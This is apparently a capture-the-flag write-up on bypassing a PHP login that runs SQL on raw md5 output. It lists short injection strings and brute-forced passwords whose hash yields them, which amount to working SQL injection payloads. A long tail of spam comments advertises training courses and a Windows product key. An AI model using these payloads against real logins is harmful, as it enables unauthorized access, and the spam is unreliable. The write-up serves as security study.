$r = mysql_query("SELECT login FROM admin WHERE password='" . md5($_GET['password'], true) . "'");
Normally, web sites keep the password hash as hex string. But this challenge keep raw hash (binary 16 bytes) in database. Binary can be string. So To bypass login, the output of md5 has to look like' or 1=1#The above string is what I thought first. But it is too long. To make the brute forcing fast, the required output string should be short. After checking from MySQL doc, I could make it shorter. Here is the list what I found
'or 1# <== no need for space after single quote, any non-zero number is TRUE '||1# <== || is same as OR, no need for space after ||Before writing the code for brute forcing, I remembered I can put non-printable characters in password using '%XX'. So 1 byte can be 256 values. No charset.
My code for brute forcing is http://pastebin.com/2xMG9rKi.
Ran it about 20 minutes on my slow windows pc, then got it.
password: 34b854c8 password: %34%b8%54%c8 result: c13e807082277c7c36231ed0dd34a863 result: ม>€p‚'||6# ะ4จc
Note: on linux, compile with "gcc -O2 -lssl -o prog prog.c" Note: If you want to see result from my program quick, run it with "./prog 4 4 200"
Submit it from url bar
url?password=%34%b8%54%c8,then got the real admin hash. It is "071CC0720D0ABD73F61A291224F248D6". But I could not reverse admin hash :( so poor me. When searched in google, I found it in hashkiller but it was not solved.
Below is not my solution
Before finished this post, I found other 2 writeups of this challenge. Very nice solutions. They found shorter SQL injection string.
First is http://cvk.posterous.com/sql-injection-with-raw-md5-hashes. The SQL injection string is
'||'Here is the modification of my code: http://pastebin.com/ThxBESPs. Got the result in a few minutes.
password: 2c55c819 password: %2c%55%c8%19 result: 3157e727097c7c27342e7dc2729f75ed result: 1W็' ||'4.}ยrŸuํSecond is http://blog.nibbles.fr/?p=2039. The SQL injection string is
'='Here is the modification of my code: http://pastebin.com/w5E54PNz. Got the result in a second.
password: 22a80f password: %22%a8%0f result: 047f1f9ed77f467a273d279d8e521422 result: žืFz'='ŽR "
Great site and a great topic as well I really get amazed to read this.There is lots of Post about Python But your way of Writing is so Good & Knowledgeable.I gained many unknown information, the way you have clearly explained is really fantastic.keep posting such useful information.
ReplyDeleteFull Stack Training in Chennai | Certification | Online Training Course
Full Stack Training in Bangalore | Certification | Online Training Course
Full Stack Training in Hyderabad | Certification | Online Training Course
Full Stack Developer Training in Chennai | Mean Stack Developer Training in Chennai
Full Stack Training
Full Stack Online Training
You have shared a nice article here. After reading your article I got very much information and It resolved many of my doubts. Thanks for sharing this article here.
ReplyDeleteIELTS Coaching in chennai
German Classes in Chennai
GRE Coaching Classes in Chennai
TOEFL Coaching in Chennai
spoken english classes in chennai | Communication training
Career progression opportunities for individuals who become Java developers are excellent. ... Keep in mind that the role of a developer covers more than just coding — development is an integral part of each stage of the engineering process so there are excellent opportunities to learn on the job
ReplyDeleteJava training in Chennai
Java Online training in Chennai
Java Course in Chennai
Best JAVA Training Institutes in Chennai
Java training in Bangalore
Java training in Hyderabad
Java Training in Coimbatore
Java Training
Java Online Training
intresting article
ReplyDeleteSoftware Testing Training in Chennai | Certification | Online
Courses
Software Testing Training in Chennai
Software Testing Online Training in Chennai
Software Testing Courses in Chennai
Software Testing Training in Bangalore
Software Testing Training in Hyderabad
Software Testing Training in Coimbatore
Software Testing Training
Software Testing Online Training
Great article with lots of useful information on Hardware and Networking Training in Chennai wonderful explanation on Hardware and Networking Courses.keep up!!
ReplyDeleteAndroid Training in Chennai
Android Online Training in Chennai
Android Training in Bangalore
Android Training in Hyderabad
Android Training in Coimbatore
Android Training
Android Online Training
I found some useful information in your blog, it was awesome to read, thanks for sharing this great content to my vision, keep sharing..
ReplyDeleteacte chennai
acte complaints
acte reviews
acte trainer complaints
acte trainer reviews
acte velachery reviews complaints
acte tambaram reviews complaints
acte anna nagar reviews complaints
acte porur reviews complaints
acte omr reviews complaints
Very interesting to read this article.I would like to thank you for the efforts you had made for writing this awesome article. This article inspired me to read more. keep it up.
ReplyDeletepython training in chennai
python course in chennai
python online training in chennai
python training in bangalore
python training in hyderabad
python online training
python training
python flask training
python flask online training
python training in coimbatore
This information you provided in the blog that is really unique I love it!! Thanks for sharing such a great blog. Keep posting..
ReplyDeleteCyber Security Training Course in Chennai | Certification | Cyber Security Online Training Course | Ethical Hacking Training Course in Chennai | Certification | Ethical Hacking Online Training Course |
CCNA Training Course in Chennai | Certification | CCNA Online Training Course | RPA Robotic Process Automation Training Course in Chennai | Certification | RPA Training Course Chennai | SEO Training in Chennai | Certification | SEO Online Training Course
one funnel away challenge
ReplyDeleteone funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
one funnel away challenge
you've got achieved a omnipresent process upon this article. Its wholly proper and intensely qualitative. you've got even managed to make it readable and clean to access. you have a few valid writing function. thank you consequently much. Product Key For Windows 7 64 Bit Ultimate
ReplyDeleteThanks for useful information
ReplyDeletejava training in hyderabad java online training in kphb">
Nice blog...We value the devotion you have shown to this site. Anticipate further excellent material.
ReplyDeletekeep posting more